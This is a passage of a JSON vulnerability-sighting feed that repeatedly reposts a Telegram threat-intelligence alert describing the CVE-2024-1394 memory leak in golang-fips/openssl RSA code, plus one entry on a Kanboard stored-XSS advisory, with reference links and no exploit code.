2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "e64ac579-2c47-411e-b213-28568071c74e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2569", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "02a5365f-a9de-4207-b94a-c3d818e5330e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1502", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "088a517f-5eb1-41d8-b41c-451ce328d74c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3W8Q-XQ97-5J7X", "type": "seen", "source": "Telegram/X69Hoh6_4i7djUBejuAQijXCf66Jnc_uFnYRKez2YtZF33U", "content": "", "creation_timestamp": "2026-04-14T17:27:49.000000Z"}, {"uuid": "1985caf5-df7b-4652-8077-2ae8a10382bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJ62-C5GR-2X53", "type": "seen", "source": "Telegram/X69Hoh6_4i7djUBejuAQijXCf66Jnc_uFnYRKez2YtZF33U", "content": "", "creation_timestamp": "2026-04-14T17:27:49.000000Z"}, {"uuid": "ae80047a-64e8-4902-85cd-8e6abe22cc18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5CGR-J3JF-JW3V", "type": "seen", "source": "Telegram/X69Hoh6_4i7djUBejuAQijXCf66Jnc_uFnYRKez2YtZF33U", "content": "", "creation_timestamp": "2026-04-14T17:27:49.000000Z"}, {"uuid": "3bc67e22-474e-4295-9f1d-1a3ca125756d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3352", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "a3eaf209-6fff-498c-ae51-f331bc5ac3c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4379", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "e694d8e5-0182-431a-ac34-b6332d7f532c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J22H-9J4X-23W5", "type": "seen", "source": "Telegram/ylyKsnGn7IUGtPSj_SQJxYkLCLx52u0woajEqQVy7zzhnhE", "content": "", "creation_timestamp": "2026-04-14T17:27:59.000000Z"}, {"uuid": "7fa92ae4-bd8b-4112-973b-1a01a4e61fa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1763", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "62dcc680-a5a8-41c2-bd28-0c3c814f3215", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5WJ3-C9V4-PJ9V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16072", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46825\n\ud83d\udd25 CVSS Score: 1.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P)\n\ud83d\udd39 Description: Kanboard is project management software that focuses on the Kanban methodology. Versions 1.2.26 through 1.2.44 have a Stored Cross-Site Scripting (XSS) Vulnerability in the `name` parameter of the `http://localhost/?controller=ProjectCreationController&amp;action=create` form. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users. Note that the default content security policy (CSP) blocks the JavaScript attack, though it can be exploited if an instance is badly configured and the software is vulnerable to CSS injection because of the unsafe-inline on the default CSP. Version 1.2.45 contains a fix for the issue.\n\ud83d\udccf Published: 2025-05-12T22:53:42.294Z\n\ud83d\udccf Modified: 2025-05-12T22:53:42.294Z\n\ud83d\udd17 References:\n1. https://github.com/kanboard/kanboard/security/advisories/GHSA-5wj3-c9v4-pj9v\n2. https://github.com/kanboard/kanboard/commit/6ebf22eeaae9f8b4abab72e3c18e45a2c4a2a808\n3. https://github.com/kanboard/kanboard/commit/ac94004ea9fc455dcc5edc8a242d67d1ccd85564\n4. https://github.com/kanboard/kanboard/blame/v1.2.44/app/Template/project_view/importTasks.php#L11", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "209e2f12-881a-4291-9718-ab668edd99aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2729", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "6d9aa7dc-df39-49f8-8eff-e93cb563457e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 